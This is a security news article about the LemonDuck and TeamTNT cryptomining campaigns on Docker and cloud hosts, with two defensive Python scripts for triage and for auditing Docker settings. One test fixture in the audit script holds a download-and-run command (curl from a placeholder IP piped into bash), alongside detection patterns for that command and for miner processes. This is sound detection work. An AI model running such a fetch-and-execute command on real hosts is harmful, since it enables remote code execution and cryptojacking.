The ongoing cryptomining malware campaign targets Docker servers

Cryptocurrency mining malware LemonDuck and other groups target cloud platforms

Cryptomining malware campaigns: cloud platforms targeted by cryptocurrency mining malware

A cross-platform cryptocurrency mining botnet is targeting Docker, AWS, and Alibaba Cloud to mine crypto on Linux systems, and reports describe the campaign as active.[1] This large-scale Monero mining campaign runs anonymously:[2] the miner routes its traffic through proxy pools, which hide the operators' wallet addresses, and it evades detection on Alibaba Cloud by disabling the platform's monitoring service.

LemonDuck previously focused on exploiting vulnerable Microsoft Exchange servers and targeted Linux machines via SSH brute-force attacks.[3] It has also targeted Windows systems vulnerable to SMBGhost and servers running Redis and Hadoop instances.

The malware is also capable of stealing credentials, deploying additional malware payloads, and triggering follow-up attacks. Crypto-mining gangs are a serious threat to poorly secured or misconfigured Docker hosts: such hosts can be exploited at scale, and the number of these campaigns has risen over the past few years.[4]

LemonDuck campaign details

The malware uses various spreading methods, including phishing emails, exploits, USB devices, and brute-force attacks. There is evidence that its operators take advantage of news about new exploits so that they can run campaigns using them immediately.[5] In past attacks LemonDuck leveraged newly patched vulnerabilities to gain access to machines and drop backdoors and information stealers on them.

In the latest campaign the malware gains initial access through exposed Docker APIs. It uses this vector to run a rogue container, which retrieves a Bash script, disguised as a harmless PNG image file, from a remote server. The script can:

  • kill processes whose names match known mining pools or competing mining groups;
  • kill daemons;
  • delete files at known indicator-of-compromise paths;
  • kill network connections to C&C servers that belong to competing groups;
  • disable the Alibaba Cloud monitoring service that would flag the suspicious activity.

Once these actions have run, the script downloads and launches the XMRig miner with a configuration that routes mining through proxy pools, hiding the wallets belonging to the actors. The malware can then attempt lateral movement, repeating the same infection process on other hosts using the SSH keys it finds on the filesystem.
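The post-exploitation stage above leaves three kinds of traces on a host: a miner process, an outbound session to a pool or proxy, and private SSH keys the script can reuse. The following triage script, an added example that is not code from the article or from the threat actors, parses constructed `ps -eo pid,user,args` and `ss -tnp` samples for those traces. The pool ports, the XMRig marker strings and the sample paths are assumptions chosen for illustration, not indicators taken from the reporting.

```python
"""Triage checks for the post-exploitation stage of the campaign.

Added example; not code from the article or from the threat actors.
Sample inputs are constructed. Pool ports and marker strings are assumptions.
"""
import os
import re
from dataclasses import dataclass

# Ports commonly used by Monero pools and mining proxies (assumption; extend
# from your own intel). Because the campaign fronts its wallets with proxy
# pools, no wallet address appears on the wire, so we key on the miner binary,
# its stratum arguments and the destination port instead.
POOL_PORTS = {3333, 4444, 5555, 7777, 14444}
MINER_MARKERS = ("xmrig", "stratum+tcp://", "stratum+ssl://", "--donate-level")
# Default OpenSSH private-key file names (certificates and .pem files are
# left out here to avoid flagging TLS material).
PRIVATE_KEY_NAMES = {"id_rsa", "id_dsa", "id_ecdsa", "id_ed25519"}

# One `ss -tnp` row: state, queues, local addr, peer addr:port, owning process.
SS_RE = re.compile(
    r'ESTAB\s+\d+\s+\d+\s+\S+\s+(\S+):(\d+)\s+users:\(\("([^"]+)",pid=(\d+)'
)


@dataclass(frozen=True)
class Finding:
    kind: str
    pid: int
    detail: str


def find_miner_processes(ps_output: str) -> list[Finding]:
    """Flag processes whose path or arguments look like XMRig."""
    findings = []
    for line in ps_output.strip().splitlines()[1:]:  # skip the header row
        pid, _user, args = line.split(maxsplit=2)
        if any(marker in args.lower() for marker in MINER_MARKERS):
            findings.append(Finding("miner_process", int(pid), args))
    return findings


def find_pool_connections(ss_output: str) -> list[Finding]:
    """Flag established TCP sessions whose peer port is a known pool port."""
    findings = []
    for peer, port, proc, pid in SS_RE.findall(ss_output):
        if int(port) in POOL_PORTS:
            findings.append(Finding("pool_connection", int(pid), f"{proc} -> {peer}:{port}"))
    return findings


def ssh_keys_at_risk(paths: list[str]) -> list[str]:
    """Private keys on disk that the script could reuse for lateral movement."""
    return sorted(p for p in paths if os.path.basename(p) in PRIVATE_KEY_NAMES)


# Constructed samples: one infected host with a miner running as root.
SAMPLE_PS = """\
    PID USER     COMMAND
      1 root     /sbin/init
   4242 root     /tmp/.x/xmrig -o stratum+tcp://pool.example.invalid:3333 --donate-level 0
   4300 root     /usr/bin/containerd
"""
SAMPLE_SS = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 10.0.0.5:51234 203.0.113.10:3333 users:(("xmrig",pid=4242,fd=7))
ESTAB 0 0 10.0.0.5:22 198.51.100.7:55120 users:(("sshd",pid=900,fd=4))
"""
SAMPLE_PATHS = [
    "/root/.ssh/id_rsa", "/root/.ssh/id_rsa.pub", "/root/.ssh/known_hosts",
    "/home/deploy/.ssh/id_ed25519", "/home/deploy/.ssh/authorized_keys",
]


def run_triage(ps_output=SAMPLE_PS, ss_output=SAMPLE_SS, paths=SAMPLE_PATHS) -> dict:
    """Run all three checks and return the findings grouped by check."""
    return {
        "miners": find_miner_processes(ps_output),
        "pool_connections": find_pool_connections(ss_output),
        "ssh_keys": ssh_keys_at_risk(paths),
    }


if __name__ == "__main__":
    for section, items in run_triage().items():
        print(section)
        for item in items:
            print("  ", item)
```

On a live host, feed the functions the real output of `ps -eo pid,user,args`, `ss -tnp` and `find / -name 'id_*'`; a process and a pool connection sharing a PID, as in the sample, is the strongest signal, and every key listed by `ssh_keys_at_risk` should be treated as compromised and rotated.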

TeamTNT with a history of targeting cloud infrastructures

These reports come shortly after another group linked to cryptocurrency miner distribution was exposed. TeamTNT targets AWS and Alibaba Cloud for cryptojacking and backdoor deployment. Its payload also appears to have been modified in response to public discussion of the group: it is designed to target Amazon Web Services while disabling cloud security solutions at the same time.[6]

The group disables cloud security services to evade detection and keep mining Monero, Ether, and Bitcoin for as long as possible without interruption. These reports show how important it is to keep these Docker threats in check.

Administrators need to ensure the Docker API is securely configured. A good starting point is the published best practices and security recommendations: never expose the API on a TCP port without authentication, enforce strict authentication policies, and apply the principle of least privilege to the containers the daemon is allowed to run.
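The two misconfigurations that make the initial access above possible are a Docker daemon listening on TCP without client-certificate authentication and containers that are allowed to reach into the host. The audit below, an added example that is not code from the article or from Docker, checks a parsed daemon.json and `docker inspect` records for both. The daemon.json keys (hosts, tlsverify, tlscacert, tlscert, tlskey) and the inspect fields (HostConfig.Privileged, Binds, PidMode, NetworkMode, Config.Cmd, Config.Entrypoint) are real Docker settings; the weak and hardened configurations, the rogue container record and the 203.0.113.10 address are constructed for illustration.

```python
"""Audit Docker daemon configuration and containers for the settings the
campaign abuses. Added example, not code from the article or from Docker.
Sample configurations and container records are constructed.
"""
import re
from urllib.parse import urlparse

# daemon.json as found on many compromised hosts: the API is reachable from
# anywhere on 2375 with no authentication, so `docker -H host:2375 run` works
# for anyone who can reach the port (constructed).
EXPOSED_DAEMON = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}

# Hardened equivalent: bind to an internal address, serve TLS on 2376 and
# require a client certificate signed by our CA (tlsverify).
HARDENED_DAEMON = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
}

TLS_FILES = ("tlscacert", "tlscert", "tlskey")
# "fetch something and pipe it into a shell", the pattern the rogue container
# uses to pull the script disguised as a PNG.
DOWNLOAD_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def audit_daemon_config(cfg: dict) -> list[str]:
    """Return findings for a parsed daemon.json; an empty list means clean."""
    findings = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix sockets are protected by filesystem permissions
        bind = urlparse(host).hostname or ""
        if not cfg.get("tlsverify"):
            findings.append(f"{host}: TCP API without client-certificate auth")
        if bind in ("0.0.0.0", "::", ""):
            findings.append(f"{host}: bound to all interfaces")
    if cfg.get("tlsverify"):
        missing = [k for k in TLS_FILES if k not in cfg]
        if missing:
            findings.append("tlsverify set but missing " + ", ".join(missing))
    return findings


def audit_container(inspect: dict) -> list[str]:
    """Flag `docker inspect` settings that match the rogue-container pattern."""
    findings = []
    name = inspect.get("Name", "?")
    hc = inspect.get("HostConfig", {})
    cfg = inspect.get("Config", {})
    if hc.get("Privileged"):
        findings.append(f"{name}: privileged container")
    for bind in hc.get("Binds") or []:  # Binds is null when nothing is mounted
        if bind.split(":")[0] == "/":
            findings.append(f"{name}: host root bind-mounted ({bind})")
    if hc.get("PidMode") == "host":
        findings.append(f"{name}: shares host PID namespace (can kill host daemons)")
    if hc.get("NetworkMode") == "host":
        findings.append(f"{name}: shares host network namespace")
    cmd = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
    if DOWNLOAD_AND_RUN.search(cmd):
        findings.append(f"{name}: command downloads and executes a script ({cmd})")
    return findings


# Constructed records in the shape of `docker inspect` output.
ROGUE_CONTAINER = {
    "Name": "/rogue",
    "Config": {"Image": "alpine", "Entrypoint": None,
               "Cmd": ["sh", "-c", "curl -s http://203.0.113.10/x.png | bash"]},
    "HostConfig": {"Privileged": False, "Binds": ["/:/mnt/host"],
                   "PidMode": "host", "NetworkMode": "host"},
}
BENIGN_CONTAINER = {
    "Name": "/web",
    "Config": {"Image": "nginx", "Entrypoint": None, "Cmd": ["nginx", "-g", "daemon off;"]},
    "HostConfig": {"Privileged": False, "Binds": ["/srv/www:/usr/share/nginx/html:ro"],
                   "PidMode": "", "NetworkMode": "bridge"},
}


if __name__ == "__main__":
    for label, cfg in (("exposed", EXPOSED_DAEMON), ("hardened", HARDENED_DAEMON)):
        print(label, audit_daemon_config(cfg) or "clean")
    for c in (ROGUE_CONTAINER, BENIGN_CONTAINER):
        print(c["Name"], audit_container(c) or "clean")
```

To run this against a real host, load `/etc/docker/daemon.json` with `json.load` and pass each element of `docker inspect $(docker ps -q)` to `audit_container`. Note that the audit only covers the settings named above; the hardened daemon.json still needs the CA and certificates it references to be issued and distributed to the clients that are allowed to talk to the API.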

About the author
Gabriel E. Hall - Passionate web researcher

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.
